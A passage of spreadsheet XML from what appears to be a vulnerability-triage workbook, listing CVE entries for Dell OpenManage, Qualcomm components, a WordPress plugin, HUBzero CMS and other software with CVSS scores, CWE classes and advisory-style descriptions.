          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-81442</t>
        </is>
      </c>
    </row>
    <row r="132">
      <c r="A132" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B132" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C132" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-81475</t>
        </is>
      </c>
      <c r="D132" s="5" t="n">
        <v>8.1</v>
      </c>
      <c r="E132" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F132" s="5" t="inlineStr">
        <is>
          <t>security_alert@emc.com</t>
        </is>
      </c>
      <c r="G132" s="5" t="inlineStr"/>
      <c r="H132" s="5" t="inlineStr"/>
      <c r="I132" s="5" t="inlineStr"/>
      <c r="J132" s="5" t="inlineStr"/>
      <c r="K132" s="5" t="inlineStr"/>
      <c r="L132" s="5" t="inlineStr"/>
      <c r="M132" s="5" t="inlineStr"/>
      <c r="N132" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O132" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P132" s="5" t="inlineStr">
        <is>
          <t>2026-09-18</t>
        </is>
      </c>
      <c r="Q132" s="5" t="inlineStr"/>
      <c r="R132" s="5" t="inlineStr">
        <is>
          <t>CWE-306</t>
        </is>
      </c>
      <c r="S132" s="5" t="inlineStr">
        <is>
          <t>Dell OpenManage Server Administrator, versions prior to 11.1.0.3, contains a Missing Authentication for Critical Function vulnerability. An unauthenticated attacker with remote access could potentially exploit this vulnerability, leading to Remote execution.</t>
        </is>
      </c>
      <c r="T132" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-81475</t>
        </is>
      </c>
    </row>
    <row r="133">
      <c r="A133" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B133" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C133" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-81476</t>
        </is>
      </c>
      <c r="D133" s="5" t="n">
        <v>8.1</v>
      </c>
      <c r="E133" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F133" s="5" t="inlineStr">
        <is>
          <t>security_alert@emc.com</t>
        </is>
      </c>
      <c r="G133" s="5" t="inlineStr"/>
      <c r="H133" s="5" t="inlineStr"/>
      <c r="I133" s="5" t="inlineStr"/>
      <c r="J133" s="5" t="inlineStr"/>
      <c r="K133" s="5" t="inlineStr"/>
      <c r="L133" s="5" t="inlineStr"/>
      <c r="M133" s="5" t="inlineStr"/>
      <c r="N133" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O133" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P133" s="5" t="inlineStr">
        <is>
          <t>2026-09-18</t>
        </is>
      </c>
      <c r="Q133" s="5" t="inlineStr"/>
      <c r="R133" s="5" t="inlineStr">
        <is>
          <t>CWE-78</t>
        </is>
      </c>
      <c r="S133" s="5" t="inlineStr">
        <is>
          <t>Dell OpenManage Server Administrator, versions prior to 11.1.0.3, contains an Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection') vulnerability. An unauthenticated attacker with remote access could potentially exploit this vulnerability, leading to Remote execution.</t>
        </is>
      </c>
      <c r="T133" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-81476</t>
        </is>
      </c>
    </row>
    <row r="134">
      <c r="A134" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B134" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C134" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-81478</t>
        </is>
      </c>
      <c r="D134" s="5" t="n">
        <v>8.1</v>
      </c>
      <c r="E134" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F134" s="5" t="inlineStr">
        <is>
          <t>security_alert@emc.com</t>
        </is>
      </c>
      <c r="G134" s="5" t="inlineStr"/>
      <c r="H134" s="5" t="inlineStr"/>
      <c r="I134" s="5" t="inlineStr"/>
      <c r="J134" s="5" t="inlineStr"/>
      <c r="K134" s="5" t="inlineStr"/>
      <c r="L134" s="5" t="inlineStr"/>
      <c r="M134" s="5" t="inlineStr"/>
      <c r="N134" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O134" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P134" s="5" t="inlineStr">
        <is>
          <t>2026-09-18</t>
        </is>
      </c>
      <c r="Q134" s="5" t="inlineStr"/>
      <c r="R134" s="5" t="inlineStr">
        <is>
          <t>CWE-321</t>
        </is>
      </c>
      <c r="S134" s="5" t="inlineStr">
        <is>
          <t>Dell OpenManage Server Administrator, versions prior to 11.1.0.3, contains a Use of Hard-coded Cryptographic Key vulnerability. An unauthenticated attacker with remote access could potentially exploit this vulnerability, leading to Unauthorized access.</t>
        </is>
      </c>
      <c r="T134" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-81478</t>
        </is>
      </c>
    </row>
    <row r="135">
      <c r="A135" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B135" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C135" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87935</t>
        </is>
      </c>
      <c r="D135" s="5" t="n">
        <v>8.1</v>
      </c>
      <c r="E135" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F135" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G135" s="5" t="inlineStr"/>
      <c r="H135" s="5" t="inlineStr"/>
      <c r="I135" s="5" t="inlineStr"/>
      <c r="J135" s="5" t="inlineStr">
        <is>
          <t>nginx</t>
        </is>
      </c>
      <c r="K135" s="5" t="inlineStr"/>
      <c r="L135" s="5" t="inlineStr"/>
      <c r="M135" s="5" t="inlineStr"/>
      <c r="N135" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O135" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P135" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q135" s="5" t="inlineStr"/>
      <c r="R135" s="5" t="inlineStr">
        <is>
          <t>CWE-434</t>
        </is>
      </c>
      <c r="S135" s="5" t="inlineStr">
        <is>
          <t>The Paid Downloads plugin for WordPress is vulnerable to Arbitrary File Upload in all versions up to, and including, 3.15 via the admin_request_handler function. This is due to missing authorization and file type validation in the admin_request_handler function, which is reachable unauthenticated via is_admin() returning true for /wp-admin/admin-post.php. This makes it possible for unauthenticated attackers to upload files that may be executable, which makes remote code execution possible. On Apache servers where AllowOverride is enabled, an .htaccess file placed in the upload directory may block direct HTTP retrieval of uploaded files, limiting exploitability to stacks that do not honor .htaccess directives such as nginx, LiteSpeed, and Apache with AllowOverride None.</t>
        </is>
      </c>
      <c r="T135" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87935</t>
        </is>
      </c>
    </row>
    <row r="136">
      <c r="A136" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B136" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C136" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-92984</t>
        </is>
      </c>
      <c r="D136" s="5" t="n">
        <v>8.1</v>
      </c>
      <c r="E136" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F136" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G136" s="5" t="inlineStr"/>
      <c r="H136" s="5" t="inlineStr"/>
      <c r="I136" s="5" t="inlineStr"/>
      <c r="J136" s="5" t="inlineStr"/>
      <c r="K136" s="5" t="inlineStr"/>
      <c r="L136" s="5" t="inlineStr"/>
      <c r="M136" s="5" t="inlineStr"/>
      <c r="N136" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O136" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P136" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q136" s="5" t="inlineStr"/>
      <c r="R136" s="5" t="inlineStr">
        <is>
          <t>CWE-384</t>
        </is>
      </c>
      <c r="S136" s="5" t="inlineStr">
        <is>
          <t>HUBzero CMS through 2.2.32 accepts session identifiers from query strings and request variables instead of cookies alone, allowing unauthenticated attackers to fixate victim sessions. Attackers can obtain a valid session identifier, send victims a crafted link containing it, and replay the identifier after the victim authenticates to hijack their account and access.</t>
        </is>
      </c>
      <c r="T136" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-92984</t>
        </is>
      </c>
    </row>
    <row r="137">
      <c r="A137" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B137" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C137" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-78428</t>
        </is>
      </c>
      <c r="D137" s="5" t="n">
        <v>8</v>
      </c>
      <c r="E137" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F137" s="5" t="inlineStr">
        <is>
          <t>meissner@suse.de</t>
        </is>
      </c>
      <c r="G137" s="5" t="inlineStr"/>
      <c r="H137" s="5" t="inlineStr"/>
      <c r="I137" s="5" t="inlineStr"/>
      <c r="J137" s="5" t="inlineStr"/>
      <c r="K137" s="5" t="inlineStr"/>
      <c r="L137" s="5" t="inlineStr"/>
      <c r="M137" s="5" t="inlineStr"/>
      <c r="N137" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O137" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P137" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q137" s="5" t="inlineStr"/>
      <c r="R137" s="5" t="inlineStr">
        <is>
          <t>CWE-384</t>
        </is>
      </c>
      <c r="S137" s="5" t="inlineStr">
        <is>
          <t>For users authenticated through SAML or OpenID Connect (OIDC), this vulnerability can result in one user receiving another user's authenticated session when multiple SSO login attempts occur concurrently</t>
        </is>
      </c>
      <c r="T137" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-78428</t>
        </is>
      </c>
    </row>
    <row r="138">
      <c r="A138" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B138" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C138" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-25282</t>
        </is>
      </c>
      <c r="D138" s="5" t="n">
        <v>7.9</v>
      </c>
      <c r="E138" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F138" s="5" t="inlineStr">
        <is>
          <t>product-security@qualcomm.com</t>
        </is>
      </c>
      <c r="G138" s="5" t="inlineStr"/>
      <c r="H138" s="5" t="inlineStr"/>
      <c r="I138" s="5" t="inlineStr"/>
      <c r="J138" s="5" t="inlineStr"/>
      <c r="K138" s="5" t="inlineStr"/>
      <c r="L138" s="5" t="inlineStr"/>
      <c r="M138" s="5" t="inlineStr"/>
      <c r="N138" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O138" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P138" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q138" s="5" t="inlineStr"/>
      <c r="R138" s="5" t="inlineStr">
        <is>
          <t>CWE-125</t>
        </is>
      </c>
      <c r="S138" s="5" t="inlineStr">
        <is>
          <t>Transient DOS when processing unverified data from a neighboring system causes out of bound memory access.</t>
        </is>
      </c>
      <c r="T138" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-25282</t>
        </is>
      </c>
    </row>
    <row r="139">
      <c r="A139" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B139" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C139" s="5" t="inlineStr">
        <is>
          <t>CVE-2025-59607</t>
        </is>
      </c>
      <c r="D139" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E139" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F139" s="5" t="inlineStr">
        <is>
          <t>product-security@qualcomm.com</t>
        </is>
      </c>
      <c r="G139" s="5" t="inlineStr"/>
      <c r="H139" s="5" t="inlineStr"/>
      <c r="I139" s="5" t="inlineStr"/>
      <c r="J139" s="5" t="inlineStr"/>
      <c r="K139" s="5" t="inlineStr"/>
      <c r="L139" s="5" t="inlineStr"/>
      <c r="M139" s="5" t="inlineStr"/>
      <c r="N139" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O139" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P139" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q139" s="5" t="inlineStr"/>
      <c r="R139" s="5" t="inlineStr">
        <is>
          <t>CWE-822</t>
        </is>
      </c>
      <c r="S139" s="5" t="inlineStr">
        <is>
          <t>Memory Corruption when copying large input data exceeds normal allocation limits.</t>
        </is>
      </c>
      <c r="T139" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2025-59607</t>
        </is>
      </c>
    </row>
    <row r="140">
      <c r="A140" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B140" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C140" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-24073</t>
        </is>
      </c>
      <c r="D140" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E140" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F140" s="5" t="inlineStr">
        <is>
          <t>product-security@qualcomm.com</t>
        </is>
      </c>
      <c r="G140" s="5" t="inlineStr"/>
      <c r="H140" s="5" t="inlineStr"/>
      <c r="I140" s="5" t="inlineStr"/>
      <c r="J140" s="5" t="inlineStr"/>
      <c r="K140" s="5" t="inlineStr"/>
      <c r="L140" s="5" t="inlineStr"/>
      <c r="M140" s="5" t="inlineStr"/>
      <c r="N140" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O140" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P140" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q140" s="5" t="inlineStr"/>
      <c r="R140" s="5" t="inlineStr">
        <is>
          <t>CWE-787</t>
        </is>
      </c>
      <c r="S140" s="5" t="inlineStr">
        <is>
          <t>Memory corruption when processing decode statistics due to insufficient validation of offset against structure size.</t>
        </is>
      </c>
      <c r="T140" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-24073</t>
        </is>
      </c>
    </row>
    <row r="141">
      <c r="A141" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B141" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C141" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-24074</t>
        </is>
      </c>
      <c r="D141" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E141" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F141" s="5" t="inlineStr">
        <is>
          <t>product-security@qualcomm.com</t>
        </is>
      </c>
      <c r="G141" s="5" t="inlineStr"/>
      <c r="H141" s="5" t="inlineStr"/>
      <c r="I141" s="5" t="inlineStr"/>
      <c r="J141" s="5" t="inlineStr"/>
      <c r="K141" s="5" t="inlineStr"/>
      <c r="L141" s="5" t="inlineStr"/>
      <c r="M141" s="5" t="inlineStr"/>
      <c r="N141" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O141" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P141" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q141" s="5" t="inlineStr"/>
      <c r="R141" s="5" t="inlineStr">
        <is>
          <t>CWE-787</t>
        </is>
      </c>
      <c r="S141" s="5" t="inlineStr">
        <is>
          <t>Memory Corruption when processing data with large offset and length values exceeds buffer limits during data copy operations.</t>
        </is>
      </c>
      <c r="T141" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-24074</t>
        </is>
      </c>
    </row>
    <row r="142">
      <c r="A142" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B142" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C142" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-24075</t>
        </is>
      </c>
      <c r="D142" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E142" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F142" s="5" t="inlineStr">
        <is>
          <t>product-security@qualcomm.com</t>
        </is>
      </c>
      <c r="G142" s="5" t="inlineStr"/>
      <c r="H142" s="5" t="inlineStr"/>
      <c r="I142" s="5" t="inlineStr"/>
      <c r="J142" s="5" t="inlineStr"/>
      <c r="K142" s="5" t="inlineStr"/>
      <c r="L142" s="5" t="inlineStr"/>
      <c r="M142" s="5" t="inlineStr"/>
      <c r="N142" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O142" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P142" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q142" s="5" t="inlineStr"/>
      <c r="R142" s="5" t="inlineStr">
        <is>
          <t>CWE-126</t>
        </is>
      </c>
      <c r="S142" s="5" t="inlineStr">
        <is>
          <t>Memory Corruption when multiple threads issue concurrent IOCTL requests to the device control handler due to improper synchronization and race conditions.</t>
        </is>
      </c>
      <c r="T142" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-24075</t>
        </is>
      </c>
    </row>
    <row r="143">
      <c r="A143" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B143" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C143" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-25278</t>
        </is>
      </c>
      <c r="D143" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E143" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F143" s="5" t="inlineStr">
        <is>
          <t>product-security@qualcomm.com</t>
        </is>
      </c>
      <c r="G143" s="5" t="inlineStr"/>
      <c r="H143" s="5" t="inlineStr"/>
      <c r="I143" s="5" t="inlineStr"/>
      <c r="J143" s="5" t="inlineStr"/>
      <c r="K143" s="5" t="inlineStr"/>
      <c r="L143" s="5" t="inlineStr"/>
      <c r="M143" s="5" t="inlineStr"/>
      <c r="N143" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O143" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P143" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q143" s="5" t="inlineStr"/>
      <c r="R143" s="5" t="inlineStr">
        <is>
          <t>CWE-367</t>
        </is>
      </c>
      <c r="S143" s="5" t="inlineStr">
        <is>
          <t>Memory Corruption when processing I2C transfer requests due to a race condition between memory allocation and data copying.</t>
        </is>
      </c>
      <c r="T143" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-25278</t>
        </is>
      </c>
    </row>
    <row r="144">
      <c r="A144" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B144" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C144" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-25280</t>
        </is>
      </c>
      <c r="D144" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E144" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F144" s="5" t="inlineStr">
        <is>
          <t>product-security@qualcomm.com</t>
        </is>
      </c>
      <c r="G144" s="5" t="inlineStr"/>
      <c r="H144" s="5" t="inlineStr"/>
      <c r="I144" s="5" t="inlineStr"/>
      <c r="J144" s="5" t="inlineStr"/>
      <c r="K144" s="5" t="inlineStr"/>
      <c r="L144" s="5" t="inlineStr"/>
      <c r="M144" s="5" t="inlineStr"/>
      <c r="N144" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O144" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P144" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q144" s="5" t="inlineStr"/>
      <c r="R144" s="5" t="inlineStr">
        <is>
          <t>CWE-787</t>
        </is>
      </c>
      <c r="S144" s="5" t="inlineStr">
        <is>
          <t>Memory corruption when processing escape handling flow with insufficient user buffer sizes.</t>
        </is>
      </c>
      <c r="T144" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-25280</t>
        </is>
      </c>
    </row>
    <row r="145">
      <c r="A145" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B145" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C145" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-25290</t>
        </is>
      </c>
      <c r="D145" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E145" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F145" s="5" t="inlineStr">
        <is>
          <t>product-security@qualcomm.com</t>
        </is>
      </c>
      <c r="G145" s="5" t="inlineStr"/>
      <c r="H145" s="5" t="inlineStr"/>
      <c r="I145" s="5" t="inlineStr"/>
      <c r="J145" s="5" t="inlineStr"/>
      <c r="K145" s="5" t="inlineStr"/>
      <c r="L145" s="5" t="inlineStr"/>
      <c r="M145" s="5" t="inlineStr"/>
      <c r="N145" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O145" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P145" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q145" s="5" t="inlineStr"/>
      <c r="R145" s="5" t="inlineStr">
        <is>
          <t>CWE-190</t>
        </is>
      </c>
      <c r="S145" s="5" t="inlineStr">
        <is>
          <t>Memory Corruption when validating large data buffers from external sources using addition to check buffer length.</t>
        </is>
      </c>
      <c r="T145" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-25290</t>
        </is>
      </c>
    </row>
    <row r="146">
      <c r="A146" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B146" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C146" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-54692</t>
        </is>
      </c>
      <c r="D146" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E146" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F146" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G146" s="5" t="inlineStr"/>
      <c r="H146" s="5" t="inlineStr"/>
      <c r="I146" s="5" t="inlineStr"/>
      <c r="J146" s="5" t="inlineStr"/>
      <c r="K146" s="5" t="inlineStr"/>
      <c r="L146" s="5" t="inlineStr"/>
      <c r="M146" s="5" t="inlineStr"/>
      <c r="N146" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O146" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P146" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q146" s="5" t="inlineStr"/>
      <c r="R146" s="5" t="inlineStr">
        <is>
          <t>CWE-131, CWE-787</t>
        </is>
      </c>
      <c r="S146" s="5" t="inlineStr">
        <is>
          <t>SAIL is a cross-platform library for loading and saving images with support for animation, metadata, and ICC profiles. Prior to 1.0.0, sail_codec_load_frame_v8_xbm() in src/sail-codecs/xbm/xbm.c allocates the decoded pixel buffer using the X11 one-byte-per-literal layout, but an X10 static short file causes the flat decode loop to write two file-controlled bytes per literal. When ceil(width/8) produces an odd row stride, the X10 literal count includes a padding byte for every row, but the destination has no space for those bytes, so loading the XBM through sail_load_from_file, sail_load_from_memory, or sail_start_loading_* produces a forward heap overwrite that scales with image height. The X11 static char path is not affected. The overwrite can corrupt process state, cause reliable crashes, and potentially enable code execution in a susceptible consuming application. This issue is fixed in version 1.0.0.</t>
        </is>
      </c>
      <c r="T146" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-54692</t>
        </is>
      </c>
    </row>
    <row r="147">
      <c r="A147" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B147" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C147" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-81474</t>
        </is>
      </c>
      <c r="D147" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E147" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F147" s="5" t="inlineStr">
        <is>
          <t>security_alert@emc.com</t>
        </is>
      </c>
      <c r="G147" s="5" t="inlineStr"/>
      <c r="H147" s="5" t="inlineStr"/>
      <c r="I147" s="5" t="inlineStr"/>
      <c r="J147" s="5" t="inlineStr"/>
      <c r="K147" s="5" t="inlineStr"/>
      <c r="L147" s="5" t="inlineStr"/>
      <c r="M147" s="5" t="inlineStr"/>
      <c r="N147" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O147" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P147" s="5" t="inlineStr">
        <is>
          <t>2026-09-18</t>
        </is>
      </c>
      <c r="Q147" s="5" t="inlineStr"/>
      <c r="R147" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="S147" s="5" t="inlineStr">
        <is>
          <t>Dell OpenManage Server Administrator, versions prior to 11.1.0.3, contains a Heap-based Buffer Overflow vulnerability. A low privileged attacker with local access could potentially exploit this vulnerability, leading to Elevation of privileges.</t>
        </is>
      </c>
      <c r="T147" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-81474</t>
        </is>
      </c>
    </row>
    <row r="148">
      <c r="A148" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B148" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C148" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86320</t>
        </is>
      </c>
      <c r="D148" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E148" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F148" s="5" t="inlineStr">
        <is>
          <t>secalert@redhat.com</t>
        </is>
      </c>
      <c r="G148" s="5" t="inlineStr"/>
      <c r="H148" s="5" t="inlineStr"/>
      <c r="I148" s="5" t="inlineStr"/>
      <c r="J148" s="5" t="inlineStr"/>
      <c r="K148" s="5" t="inlineStr"/>
      <c r="L148" s="5" t="inlineStr"/>
      <c r="M148" s="5" t="inlineStr"/>
      <c r="N148" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O148" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P148" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q148" s="5" t="inlineStr"/>
      <c r="R148" s="5" t="inlineStr">
        <is>
          <t>CWE-94</t>
        </is>
      </c>
      <c r="S148" s="5" t="inlineStr">
        <is>
          <t>A flaw was found in flatpak-builder where Git hooks are not disabled when applying patch sources with use-git-am: true. An attacker who can provide a malicious source containing a Git post-applypatch hook can cause the hook to execute on the host during the build process, resulting in arbitrary code execution with the privileges of the user running flatpak-builder.</t>
        </is>
      </c>
